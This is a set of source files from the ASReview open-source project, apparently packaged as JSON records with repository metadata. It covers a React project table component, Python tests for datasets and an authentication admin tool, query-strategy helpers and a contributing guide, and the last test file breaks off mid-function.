queryClient.setQueryData(\"fetchProjects\", (prev) => {\n return {\n ...prev,\n result: prev.result.map((project) => {\n return {\n ...project,\n reviews: project.reviews.map((review) => {\n return {\n ...review,\n status:\n project.id === variables.project_id\n ? variables.status\n : review.status,\n };\n }),\n };\n }),\n };\n });\n },\n });\n\n const handleChangeStatus = (project) => {\n mutateStatus({\n project_id: project[\"id\"],\n status:\n project.reviews[0].status === projectStatuses.REVIEW\n ? projectStatuses.FINISHED\n : projectStatuses.REVIEW,\n });\n };\n\n const clearSetupError = (project) => {\n mutateStatus({\n project_id: project[\"id\"],\n status: projectStatuses.SETUP,\n });\n };\n\n const openProject = (project, path) => {\n if (\n project[\"reviews\"][0] === undefined ||\n project[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n project[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n ) {\n // set project id\n props.setProjectId(project[\"id\"]);\n // open project setup dialog\n props.toggleProjectSetup();\n // clear potential setup error\n if (\n project[\"reviews\"][0] !== undefined &&\n project[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n ) {\n clearSetupError(project);\n }\n } else if (!project[\"projectNeedsUpgrade\"]) {\n // open project page\n navigate(`/projects/${project[\"id\"]}/${path}`);\n } else {\n // open project check dialog\n props.setProjectCheck({\n open: true,\n issue: \"upgrade\",\n path: path,\n project_id: project[\"id\"],\n });\n }\n };\n\n /**\n * Show buttons when hovering over project title\n */\n const hoverOnProject = (project_id, project_title, owner_id) => {\n setHoverRowId(project_id);\n setHoverRowIdPersistent(project_id);\n setHoverRowTitle(project_title);\n setHoverIsOwner(authenticated && owner_id !== auth.id ? false : true);\n };\n\n const hoverOffProject = () => {\n setHoverRowId(null);\n };\n\n const formatMode = (mode) => {\n if (mode === \"oracle\" || !mode) {\n return \"Oracle\";\n }\n if (mode === \"explore\") {\n return \"Exploration\";\n }\n if (mode === \"simulate\") {\n return \"Simulation\";\n }\n };\n\n /**\n * Return status label and style\n */\n const status = (project) => {\n if (\n project.reviews[0] === undefined ||\n project.reviews[0].status === projectStatuses.SETUP ||\n project.reviews[0].status === projectStatuses.ERROR\n ) {\n return [projectStatuses.SETUP, \"Setup\"];\n }\n if (project.reviews[0].status === projectStatuses.REVIEW) {\n return [projectStatuses.REVIEW, \"In Review\"];\n }\n if (project.reviews[0].status === projectStatuses.FINISHED) {\n return [projectStatuses.FINISHED, \"Finished\"];\n }\n };\n\n const statusStyle = (project) => {\n if (\n project.reviews[0] === undefined ||\n project.reviews[0].status === projectStatuses.SETUP ||\n project.reviews[0].status === projectStatuses.ERROR\n ) {\n return \"dashboard-page-table-chip setup\";\n }\n if (project.reviews[0].status === projectStatuses.REVIEW) {\n return \"dashboard-page-table-chip inreview\";\n }\n if (project.reviews[0].status === projectStatuses.FINISHED) {\n return \"dashboard-page-table-chip finished\";\n }\n };\n\n /**\n * Table pagination & rows per page setting\n */\n const handlePage = (event, newPage) => {\n setPage(newPage);\n };\n\n const setRowsPerPage = (event) => {\n handleRowsPerPage(+event.target.value);\n setPage(0);\n };\n\n return (\n <StyledPaper elevation={2} className={classes.root}>\n <TableContainer>\n <Table className={classes.table} stickyHeader aria-label=\"sticky table\">\n <TableHead>\n <TableRow>\n {columns.map((column) => (\n <TableCell key={column.id} style={{ width: column.width }}>\n {column.label}\n </TableCell>\n ))}\n </TableRow>\n </TableHead>\n <TableBody>\n {!isError &&\n !isFetching &&\n isFetched &&\n isSuccess &&\n myProjects\n ?.slice(page * rowsPerPage, page * rowsPerPage + rowsPerPage)\n .map((row) => {\n // if we do authentication, then we need to know who the owner is\n row[\"owner_id\"] =\n authenticated && \"owner_id\" in row\n ? row[\"owner_id\"]\n : false;\n // A collaborator can not edit\n const isOwner = authenticated && row[\"owner_id\"] === auth.id;\n\n const isSimulating = () => {\n return (\n row[\"mode\"] === projectModes.SIMULATION &&\n row[\"reviews\"][0] !== undefined &&\n row[\"reviews\"][0][\"status\"] === projectStatuses.REVIEW\n );\n };\n\n const showAnalyticsButton = () => {\n return (\n row[\"reviews\"][0] !== undefined &&\n !(\n row[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n )\n );\n };\n\n const showReviewButton = () => {\n return (\n row[\"reviews\"][0] !== undefined &&\n row[\"reviews\"][0][\"status\"] === projectStatuses.REVIEW\n );\n };\n\n const disableProjectStatusChange = () => {\n return (\n row[\"projectNeedsUpgrade\"] ||\n row[\"mode\"] === projectModes.SIMULATION ||\n row[\"reviews\"][0] === undefined ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n );\n };\n\n const onClickProjectAnalytics = () => {\n openProject(row, \"\");\n };\n\n const onClickProjectReview = () => {\n openProject(row, \"review\");\n };\n\n const onClickCollaboration = () => {\n openProject(row, \"team\");\n // ******* toggleCollaboDialog();\n };\n\n const onClickProjectExport = () => {\n if (\n row[\"reviews\"][0] === undefined ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n ) {\n queryClient.prefetchQuery(\n [\"fetchExportProject\", { project_id: row[\"id\"] }],\n ProjectAPI.fetchExportProject,\n );\n } else {\n openProject(row, \"export\");\n }\n };\n\n const onClickProjectDetails = () => {\n openProject(row, \"details\");\n };\n\n const updateProjectStatus = () => {\n handleChangeStatus(row);\n };\n return (\n <TableRow\n hover\n role=\"checkbox\"\n tabIndex={-1}\n key={row.id}\n onMouseEnter={() => {\n return hoverOnProject(\n row[\"id\"],\n row[\"name\"],\n row[\"owner_id\"],\n );\n }}\n onMouseLeave={() => hoverOffProject()}\n >\n <TableCell sx={{ display: \"flex\" }}>\n <Box className={classes.titleWrapper}>\n <Typography\n onClick={onClickProjectAnalytics}\n className={classes.title}\n variant=\"subtitle1\"\n >\n {row[\"name\"]}\n </Typography>\n <Box sx={{ flex: 1 }}></Box>\n {hoverRowId === row.id && (\n <TableRowButton\n disableProjectStatusChange={\n disableProjectStatusChange\n }\n isSimulating={isSimulating}\n isOwner={isOwner}\n showAnalyticsButton={showAnalyticsButton}\n showReviewButton={showReviewButton}\n onClickProjectAnalytics={onClickProjectAnalytics}\n onClickCollaboration={onClickCollaboration}\n onClickEndCollaboration={\n onClickCollaboration\n } /* !!!!!!!!! */\n onClickProjectReview={onClickProjectReview}\n onClickProjectExport={onClickProjectExport}\n onClickProjectDetails={onClickProjectDetails}\n projectStatus={status(row)[0]}\n toggleDeleteDialog={toggleDeleteDialog}\n updateProjectStatus={updateProjectStatus}\n //canEdit={canEdit}\n />\n )}\n </Box>\n </TableCell>\n <TableCell>\n <Typography\n className={classes.tableCell}\n variant=\"subtitle1\"\n noWrap\n >\n {formatDate(row[\"created_at_unix\"])}\n </Typography>\n </TableCell>\n <TableCell>\n <Typography\n className={classes.tableCell}\n variant=\"subtitle1\"\n noWrap\n >\n {formatMode(row[\"mode\"])}\n </Typography>\n </TableCell>\n <TableCell className={classes.tableCell}>\n <Chip\n size=\"small\"\n className={statusStyle(row)}\n label={status(row)[1]}\n />\n </TableCell>\n </TableRow>\n );\n })}\n </TableBody>\n </Table>\n {!isError && isFetching && (\n <Box className={classes.loadingProjects}>\n <CircularProgress />\n </Box>\n )}\n {!isError &&\n !isFetching &&\n isFetched &&\n isSuccess &&\n myProjects.length === 0 && (\n <Box\n sx={{\n alignItems: \"center\",\n display: \"flex\",\n flexDirection: \"column\",\n }}\n >\n <Typography sx={{ color: \"text.secondary\", marginTop: \"64px\" }}>\n Your projects will show up here\n </Typography>\n <Button onClick={props.toggleProjectSetup}>Get Started</Button>\n <img\n src={ElasArrowRightAhead}\n alt=\"ElasArrowRightAhead\"\n className={classes.img}\n />\n </Box>\n )}\n {isError && !isFetching && (\n <Box className={classes.error}>\n <BoxErrorHandler error={error} queryKey=\"fetchProjects\" />\n </Box>\n )}\n </TableContainer>\n {!isError &&\n !isFetching &&\n isFetched &&\n isSuccess &&\n myProjects.length !== 0 && (\n <TablePagination\n rowsPerPageOptions={[5, 10, 15]}\n component=\"div\"\n count={myProjects.length}\n rowsPerPage={rowsPerPage}\n labelRowsPerPage=\"Projects per page:\"\n page={page}\n onPageChange={handlePage}\n onRowsPerPageChange={setRowsPerPage}\n />\n )}\n <ProjectCheckDialog\n projectCheck={props.projectCheck}\n setProjectCheck={props.setProjectCheck}\n />\n <ProjectDeleteDialog\n onDeleteDialog={onDeleteDialog}\n toggleDeleteDialog={toggleDeleteDialog}\n projectTitle={hoverRowTitle}\n project_id={hoverRowIdPersistent}\n isOwner={hoverIsOwner}\n />\n <DialogErrorHandler\n error={querySimulationError}\n isError={querySimulationError.isError}\n queryKey=\"fetchProjects\"\n />\n </StyledPaper>\n );\n};\n\nexport default connect(null, mapDispatchToProps)(ProjectTable);\n" }, { "alpha_fraction": 0.649965226650238, "alphanum_fraction": 0.6631872057914734, "avg_line_length": 25.61111068725586, "blob_id": "52d07f88e37e9f3057464d4b02821a1372a5e275", "content_id": "8f99f1d98edb492a07a4dbb356ab8ada8dfd66e2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2874, "license_type": "permissive", "max_line_length": 88, "num_lines": 108, "path": "/tests/test_datasets.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom asreview.datasets import BaseDataGroup\nfrom asreview.datasets import BaseDataSet\nfrom asreview.datasets import DatasetManager\nfrom asreview.datasets import NaturePublicationDataGroup\n\n\[email protected](\n \"data_id\",\n [\n \"benchmark:van_de_Schoot_2017\",\n \"benchmark:Hall_2012\",\n \"benchmark:Cohen_2006_ACEInhibitors\",\n \"benchmark:Bos_2018\",\n ],\n)\ndef test_datasets(data_id):\n data = DatasetManager().find(data_id)\n assert data.filepath.startswith(\"https://raw.githubusercontent.com/asreview/\")\n assert data.title is not None\n\n\ndef test_group():\n group_nature = NaturePublicationDataGroup()\n\n assert group_nature.group_id is not None\n\n assert len(group_nature.datasets) == 4\n\n for d in group_nature.datasets:\n assert d.filepath.startswith(\n \"https://raw.githubusercontent.com/asreview/paper-asreview\"\n )\n\n\ndef test_group_to_dict():\n group_nature = NaturePublicationDataGroup()\n\n assert isinstance(group_nature.__dict__(), dict)\n\n\ndef test_group_list():\n dm = DatasetManager()\n\n nature_group = dm.list(\n include=\"benchmark-nature\", raise_on_error=True, serialize=False\n )[0]\n\n assert len(nature_group.datasets) == 4\n\n for d in nature_group.datasets:\n assert d.filepath.startswith(\n \"https://raw.githubusercontent.com/asreview/paper-asreview\"\n )\n\n\ndef test_group_exclude_list():\n dm = DatasetManager()\n\n groups = dm.list(exclude=\"benchmark-nature\", raise_on_error=True, serialize=False)\n assert \"benchmark-nature\" not in [group.group_id for group in groups]\n\n groups = dm.list(exclude=[\"benchmark-nature\"], raise_on_error=True, serialize=False)\n assert \"benchmark-nature\" not in [group.group_id for group in groups]\n\n\ndef test_template_group():\n # START - use for building your plugin\n my_dataset1 = BaseDataSet(\n dataset_id=\"my_dataset1\", filepath=\"http\", title=\"My dataset\"\n )\n\n my_dataset2 = BaseDataSet(\n dataset_id=\"my_dataset2\",\n filepath=\"http\",\n title=\"My second dataset\",\n aliases=[\"J535\"],\n )\n\n class TemplateDataGroup(BaseDataGroup):\n group_id = \"template\"\n description = \"Template group\"\n\n def __init__(self):\n super(TemplateDataGroup, self).__init__(my_dataset1, my_dataset2)\n\n # END\n\n my_group = TemplateDataGroup()\n\n my_group.find(\"my_dataset1\").title == \"My dataset\"\n my_group.find(\"j535\").title == \"My second dataset\" # see lowercase alias\n\n\[email protected](raises=TypeError)\ndef test_template_group_abc():\n my_dataset1 = BaseDataSet(\n dataset_id=\"my_dataset2\",\n filepath=\"http\",\n title=\"My second dataset\",\n aliases=[\"J535\"],\n )\n\n class TemplateDataGroup(BaseDataGroup):\n description = \"Template group\"\n\n TemplateDataGroup(my_dataset1)\n" }, { "alpha_fraction": 0.6765119433403015, "alphanum_fraction": 0.6849507689476013, "avg_line_length": 32.85714340209961, "blob_id": "90d4f87f5d854984be624f2ad0c909096fab170b", "content_id": "2b0fc379a1a6fbb68bb50aad8698c696094e3ed1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 711, "license_type": "permissive", "max_line_length": 77, "num_lines": 21, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/UserListEntry.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import ListItem from \"@mui/material/ListItem\";\nimport ListItemAvatar from \"@mui/material/ListItemAvatar\";\nimport ListItemText from \"@mui/material/ListItemText\";\nimport PersonIcon from \"@mui/icons-material/Person\";\nimport Avatar from \"@mui/material/Avatar\";\nimport { blue } from \"@mui/material/colors\";\n\nconst UserListEntry = (props) => {\n return (\n <ListItem button onDoubleClick={() => props.onDoubleClick(props.user)}>\n <ListItemAvatar>\n <Avatar sx={{ bgcolor: blue[100], color: blue[600] }}>\n <PersonIcon />\n </Avatar>\n </ListItemAvatar>\n <ListItemText primary={props.user.name} secondary={props.user.email} />\n </ListItem>\n );\n};\n\nexport default UserListEntry;\n" }, { "alpha_fraction": 0.6631016135215759, "alphanum_fraction": 0.6689353585243225, "avg_line_length": 27.971830368041992, "blob_id": "ee9861d9318c03a00876eea465e8e16686c2da45", "content_id": "df0dd628125d78c68c825748648fe97a57d0b745", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2057, "license_type": "permissive", "max_line_length": 75, "num_lines": 71, "path": "/asreview/models/query/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.utils import _entry_points\n\n\ndef list_query_strategies():\n \"\"\"List available query strategy classes.\n\n This excludes all possible mixed query strategies.\n\n Returns\n -------\n list\n Classes of available query strategies in alphabetical order.\n \"\"\"\n return [e.load() for e in _entry_points(group=\"asreview.models.query\")]\n\n\ndef get_query_class(name):\n \"\"\"Get class of query strategy from its name.\n\n Arguments\n ---------\n name: str\n Name of the query strategy, e.g. 'max', 'uncertainty', 'random.\n A special mixed query strategy is als possible. The mix is denoted\n by an underscore: 'max_random' or 'max_uncertainty'.\n\n Returns\n -------\n class\n Class corresponding to the name name.\n \"\"\"\n\n return _entry_points(group=\"asreview.models.query\")[name].load()\n\n\ndef get_query_model(name, *args, random_state=None, **kwargs):\n \"\"\"Get an instance of the query strategy.\n\n Arguments\n ---------\n name: str\n Name of the query strategy.\n *args:\n Arguments for the model.\n **kwargs:\n Keyword arguments for the model.\n\n Returns\n -------\n asreview.query.base.BaseQueryModel\n Initialized instance of query strategy.\n \"\"\"\n query_class = get_query_class(name)\n try:\n return query_class(*args, random_state=random_state, **kwargs)\n except TypeError:\n return query_class(*args, **kwargs)\n" }, { "alpha_fraction": 0.77073734998703, "alphanum_fraction": 0.7724654674530029, "avg_line_length": 52.41538619995117, "blob_id": "bac221abf52d56d8bb37971fde0eede6b5c97bc7", "content_id": "e4b964d01acfac57a8eda9c78c19f356d8353b70", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3490, "license_type": "permissive", "max_line_length": 161, "num_lines": 65, "path": "/CONTRIBUTING.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Contributing to ASReview\nHello dear contributor-to-be! :wave:\n\nAwesome to see that you're considering to contribute to ASReview!\nBelow you will find some guidelines for your future contributions.\n\n#### Feel free to propose changes of any kind!\nYour ideas and input are very much appreciated.\nFrom contributing to source code to improving readability of the documentation, all suggestions are welcome!\n\nThere are multiple ways to contribute:\n- [Reporting bugs](#reporting-bugs) :bug: :ant: 🐞\n- [Suggesting enhancements](#feature-request)\n- [Contribute code](#contribute-code)\n- [Contribute in discussions](#discussions)\n\n## Reporting bugs\nIs something not working as expected 🤔?\n\nCreate an [issue](https://github.com/asreview/asreview/issues/new/choose) and select `Bug report 🐛`.\n\n## Feature request\nDo you have a suggestion (and may want to implement it 🙂)?\n\nCreate an [issue](https://github.com/asreview/asreview/issues/new/choose) and use the `🚀 Feature request` template.\n\n## Contribute code\nWant to try to fix the bug you found?\nBuild your feature request yourself?\nBrilliant! :heart_eyes:\nYou can submit your changes to ASReview [by creating a pull request](https://github.com/asreview/asreview/pull/new/master).\n\n#### Unsure where to begin? Here are a few examples: \n- Improve the [documentation](https://asreview.readthedocs.io/en/latest/). :memo:\n- Propose a fix to an existing issue. :warning:\n - See the [issue list here](https://github.com/asreview/asreview/issues).\n- Add a new dataset to [our open dataset repository](https://github.com/asreview/systematic-review-datasets/)\n - See this [pull request](https://github.com/asreview/systematic-review-datasets/pull/11) for an example.\n- Looking to develop your own extension? :electric_plug:\n - See [create extensions](https://asreview.readthedocs.io/en/latest/extensions_dev.html) for detailed instructions.\n - See the current [list of extensions](https://github.com/asreview/asreview/discussions/1140)\n\n## Discussions\nGot any questions for the ASReview community?\nOr perhaps you know the answer to a question asked? 💡\nDon't hesitate to post on the [discussion board](https://github.com/asreview/asreview/discussions).\n\n## First timer?\nDo you have little experience with contributing to open-source project and working with GitHub? :octocat: No worries! There are some amazing tutorials out there:\n\n- [First timers only](https://www.firsttimersonly.com)\n - See the [first-contributions repo](https://github.com/firstcontributions/first-contributions) for a tutorial on how to contribute code.\n- [How To Contribute To An Open Source Project on GitHub](https://egghead.io/courses/how-to-contribute-to-an-open-source-project-on-github).\n- [Mastering Issues](https://guides.github.com/features/issues/) by GitHub.\n- [About Pull Requests](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests/about-pull-requests) by GitHub.\n\n## Life after the pull request\nYour pull request will be carefully reviewed by the maintainers.\nThey will get back at you as soon as possible and possibly start integrating your suggestions and/or contributions into the project.\n\n## Need more information?\nIf you have any more questions, do not hesitate to send an e-mail to [email protected].\nYou can also [sign up for the newsletter](https://asreview.ai/newsletter/subscribe) for the latest updates on ASReview straight to your inbox! :email:\n\nThanks again for your contribution, the ASReview team. :yellow_heart:\n" }, { "alpha_fraction": 0.6547278165817261, "alphanum_fraction": 0.663536012172699, "avg_line_length": 33.771217346191406, "blob_id": "bc4692c1573f8073b6fd43508ea2c51588bd6c4c", "content_id": "01c01b4ce3b957f6280f601c99db009d1efc8b01", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18846, "license_type": "permissive", "max_line_length": 77, "num_lines": 542, "path": "/asreview/webapp/tests/test_extensions/test_auth_tool.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import json\nfrom argparse import Namespace\nfrom pathlib import Path\nfrom unittest.mock import patch\nfrom uuid import uuid4\n\nimport pytest\n\nimport asreview.entry_points.auth_tool as tool\nfrom asreview.entry_points.auth_tool import AuthTool\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\nfrom asreview.utils import asreview_path\nfrom asreview.webapp import DB\nfrom asreview.webapp.tests.utils import api_utils as au\nfrom asreview.webapp.tests.utils import config_parser as cp\nfrom asreview.webapp.tests.utils import crud\nfrom asreview.webapp.tests.utils import misc\n\n\ndef get_auth_tool_object(namespace):\n \"\"\"This function returns an AuthTool object in which\n the session feature is set to the test database and\n the args feature is set with the <namespace> input\n parameter.\"\"\"\n tool = AuthTool()\n # manipulate the DB session\n tool.session = DB.session\n tool.args = namespace\n return tool\n\n\ndef interactive_user_data():\n \"\"\"This function returns a list of strings that can be\n used to trigger an interactively created user account.\"\"\"\n user_data = cp.get_user_data(1)\n return [\n \"Y\",\n user_data[\"email\"],\n user_data[\"name\"],\n user_data[\"affiliation\"],\n user_data[\"password\"],\n \"n\",\n ]\n\n\ndef import_2_unauthenticated_projects(with_upgrade=True):\n \"\"\"This function retrieves 2 zipped project (version 0.x)\n files from github and copies them in the asreview folder.\n To use them in tests they need to be upgraded. Both projects\n are returned.\"\"\"\n # get 2 unauthenticated projects\n url1 = misc.retrieve_project_url_github(\"v0.19\")\n url2 = misc.retrieve_project_url_github(\"v0.18\")\n # import projects\n proj1 = misc.copy_github_project_into_asreview_folder(url1)\n proj2 = misc.copy_github_project_into_asreview_folder(url2)\n if with_upgrade:\n # update these projects to a 1.x-ish config\n upgrade_asreview_project_file(proj1.project_path)\n upgrade_asreview_project_file(proj2.project_path)\n return proj1, proj2\n\n\n# Test verifying uuid: correct\ndef test_verify_id_correct_id():\n id = uuid4().hex\n assert tool.verify_id(id)\n\n\n# Test verifying uuid: incorrect id\ndef test_verify_id_incorrect_id():\n id = \"incorrect-id\"\n assert not tool.verify_id(id)\n\n\n# Test inserting a user into the database\ndef test_insert_user(client_auth):\n # count users\n assert crud.count_users() == 0\n # get some user credentials\n user_data = cp.get_user_data(1)\n # insert the returned dictionary\n tool.insert_user(DB.session, user_data)\n # count users again\n assert crud.count_users() == 1\n # get user\n user = crud.last_user()\n assert user.email == user_data[\"email\"]\n assert user.identifier == user_data[\"email\"]\n assert user.origin == \"asreview\"\n assert user.name == user_data[\"name\"]\n assert user.affiliation == user_data[\"affiliation\"]\n assert user.confirmed\n\n\n# Test inserting a duplicate\ndef test_insert_user_duplicate(client_auth):\n # count users\n assert crud.count_users() == 0\n # get some user credentials\n user_data = cp.get_user_data(1)\n # insert the returned dictionary\n tool.insert_user(DB.session, user_data)\n # verify user has been created\n assert crud.count_users() == 1\n # and again\n result = tool.insert_user(DB.session, user_data)\n # asserts\n assert not result\n # no inserts, count remains 1\n assert crud.count_users() == 1\n\n\n# Test inserting a project record in the database\ndef test_inserting_a_project_record(client_auth):\n # count projects\n assert crud.count_projects() == 0\n # insert this data\n data = {\"project_id\": uuid4().hex, \"owner_id\": 2}\n tool.insert_project(DB.session, data)\n # count again\n assert crud.count_projects() == 1\n # get last record\n project = crud.last_project()\n assert project.project_id == data[\"project_id\"]\n assert project.owner_id == data[\"owner_id\"]\n\n\n# Test updating a project record in the database\ndef test_updating_a_project_record(client_auth):\n # count projects\n assert crud.count_projects() == 0\n # insert this data\n data = {\"project_id\": uuid4().hex, \"owner_id\": 2}\n tool.insert_project(DB.session, data)\n # count again\n assert crud.count_projects() == 1\n # change owner id\n data[\"owner_id\"] = 3\n tool.insert_project(DB.session, data)\n # count again, no inserts, count remains 1\n assert crud.count_projects() == 1\n project = crud.last_project()\n assert project.project_id == data[\"project_id\"]\n assert project.owner_id == data[\"owner_id\"]\n\n\n# Test get users\ndef test_get_users(client_auth):\n # create 2 users\n user1 = crud.create_user(DB, 1)\n user2 = crud.create_user(DB, 2)\n print(user1, user2)\n assert crud.count_users() == 2\n # test function\n result = tool.get_users(DB.session)\n assert set(result) == set([user1, user2])\n\n\n# ####################\n# Test AuthTool Object\n# ####################\n\n\n# insert users with json string\ndef test_auth_tool_add_users_with_json(client_auth):\n # assert we have no users\n assert crud.count_users() == 0\n # build appropriate json argument\n user_data = cp.get_user_data(1)\n namespace = Namespace(json=f\"{json.dumps([user_data])}\")\n # get auth_tool object\n auth_tool = get_auth_tool_object(namespace)\n # execute add users function\n auth_tool.add_users()\n # assert we now have a user\n assert crud.count_users() == 1\n user = crud.last_user()\n # quick asserts, we have already tested this in\n # test_insert_user\n assert user.email == user_data[\"email\"]\n assert user.identifier == user_data[\"email\"]\n\n\n# insert users interactively, correct input\ndef test_auth_tool_add_users_interact(client_auth):\n # assert we have no users\n assert crud.count_users() == 0\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # build interactive input\n answers = interactive_user_data()\n with patch('builtins.input', side_effect=answers):\n auth_tool.add_users()\n # assert we now have a users\n assert crud.count_users() == 1\n\n\n# insert users interactively, incorrect email\ndef test_auth_tool_add_users_interact_incorr_email(client_auth, capsys):\n \"\"\"This test interactively inserts a user account, but\n a non valid email address is provided\"\"\"\n # assert we have no users\n assert crud.count_users() == 0\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # build interactive input\n answers = interactive_user_data()\n # add in a faulty email address\n answers.insert(1, \"abcd@\")\n with patch('builtins.input', side_effect=answers):\n auth_tool.add_users()\n _, err = capsys.readouterr()\n assert \"Entered email address is not recognized\" in err\n # assert we now have a users\n assert crud.count_users() == 1\n\n\n# insert users interactively, name too short\ndef test_auth_tool_add_users_interact_incorr_name(client_auth, capsys):\n \"\"\"This test interactively inserts a user account, but\n a short name is provided\"\"\"\n # assert we have no users\n assert crud.count_users() == 0\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # build interactive input\n answers = interactive_user_data()\n # add in a name that is too short\n answers.insert(2, \"ab\")\n with patch('builtins.input', side_effect=answers):\n auth_tool.add_users()\n _, err = capsys.readouterr()\n assert \"Full name must contain more than 2\" in err\n # assert we now have a users\n assert crud.count_users() == 1\n\n\n# insert users interactively, bad password\ndef test_auth_tool_add_users_interact_incorr_passw(client_auth, capsys):\n \"\"\"This test interactively inserts a user account, but\n a non valid password is provided\"\"\"\n # assert we have no users\n assert crud.count_users() == 0\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # build interactive input\n answers = interactive_user_data()\n # add in a name that is too short\n answers.insert(4, \"1111\")\n with patch('builtins.input', side_effect=answers):\n auth_tool.add_users()\n _, err = capsys.readouterr()\n assert \"Use 8 or more characters with a mix\" in err\n # assert we now have a users\n assert crud.count_users() == 1\n\n\n# Test validity check. Note: this and the next test can not\n# be parametrized because of the tested function: it -needs-\n# to be finished with a correct value\ndef test_validity_function_valid(capsys):\n \"\"\"Tests the _ensure_valid_value_for method, expects\n no error messages if the input value respects the\n lambda function.\"\"\"\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # define a correct value\n correct = \"a\"\n hint = \"Test hint\"\n # run function with patched input\n with patch('builtins.input', side_effect=[correct]):\n # run validity function\n auth_tool._ensure_valid_value_for(\n \"test\", lambda x: x == correct, hint=hint\n )\n out, err = capsys.readouterr()\n assert not bool(out)\n assert not bool(err)\n\n\n# Test validity check, see remark previous test if you notice\n# the repetition\ndef test_validity_function_invalid(capsys):\n \"\"\"Tests the _ensure_valid_value_for method, expects\n error messages if the input value does not respect the\n lambda function.\"\"\"\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # define a correct value\n correct = \"a\"\n incorrect = \"b\"\n hint = \"Test hint\"\n # run function with patched input\n with patch('builtins.input', side_effect=[incorrect, correct]):\n # run validity function\n auth_tool._ensure_valid_value_for(\n \"test\", lambda x: x == correct, hint=hint\n )\n out, err = capsys.readouterr()\n assert not bool(out)\n assert err == hint\n\n\n# Test printing a project\ndef test_print_project(capsys):\n keys = [\"folder\", \"version\", \"project_id\", \"name\", \"authors\", \"created\"]\n data = {k: uuid4().hex for k in keys}\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool._print_project(data)\n out, _ = capsys.readouterr()\n assert f\"* {data['folder']}\" in out\n assert f\"version: {data['version']}\" in out\n assert f\"id: {data['project_id']}\" in out\n assert f\"name: {data['name']}\" in out\n assert f\"authors: {data['authors']}\" in out\n assert f\"created: {data['created']}\" in out\n\n\n# Test printing a user with affiliation\ndef test_print_user_with_affiliation(client_auth, capsys):\n user = crud.create_user(DB, 1)\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool._print_user(user)\n out, _ = capsys.readouterr()\n expected = f\"{user.id} - {user.email} ({user.name}), {user.affiliation}\"\n assert out.strip() == expected\n\n\n# Test printing a user without affiliation\ndef test_print_user_without_affiliation(client_auth, capsys):\n user = crud.create_user(DB, 1)\n user.affiliation = None\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool._print_user(user)\n out, _ = capsys.readouterr()\n expected = f\"{user.id} - {user.email} ({user.name})\"\n assert out.strip() == expected\n\n\n# Testing _get_projects\ndef test_get_projects(client_no_auth):\n # create a project\n _, data = au.create_project(client_no_auth, \"test\")\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n result = auth_tool._get_projects()\n assert isinstance(result, list)\n assert len(result) == 1\n result = result[0]\n assert result[\"folder\"] == data[\"id\"]\n assert result[\"version\"] == data[\"version\"]\n assert result[\"project_id\"] == data[\"id\"]\n assert result[\"name\"] == data[\"name\"]\n assert result[\"authors\"] == data[\"authors\"]\n assert result[\"created\"] == data[\"datetimeCreated\"]\n assert result[\"owner_id\"] == 0\n\n\n# Test listing users\ndef test_list_users(client_auth, capsys):\n # create 2 users\n u1 = crud.create_user(DB, 1)\n u2 = crud.create_user(DB, 2)\n assert crud.count_users() == 2\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool.list_users()\n out, _ = capsys.readouterr()\n exp1 = f\"{u1.id} - {u1.email} ({u1.name}), {u1.affiliation}\"\n exp2 = f\"{u2.id} - {u2.email} ({u2.name}), {u2.affiliation}\"\n assert exp1 in out\n assert exp2 in out\n\n\n# Test list projects: no json data\ndef test_list_projects_no_json(client_no_auth, capsys):\n # create two projects\n _, data1 = au.create_project(client_no_auth, \"test1\")\n _, data2 = au.create_project(client_no_auth, \"test2\")\n # get auth_tool object\n auth_tool = 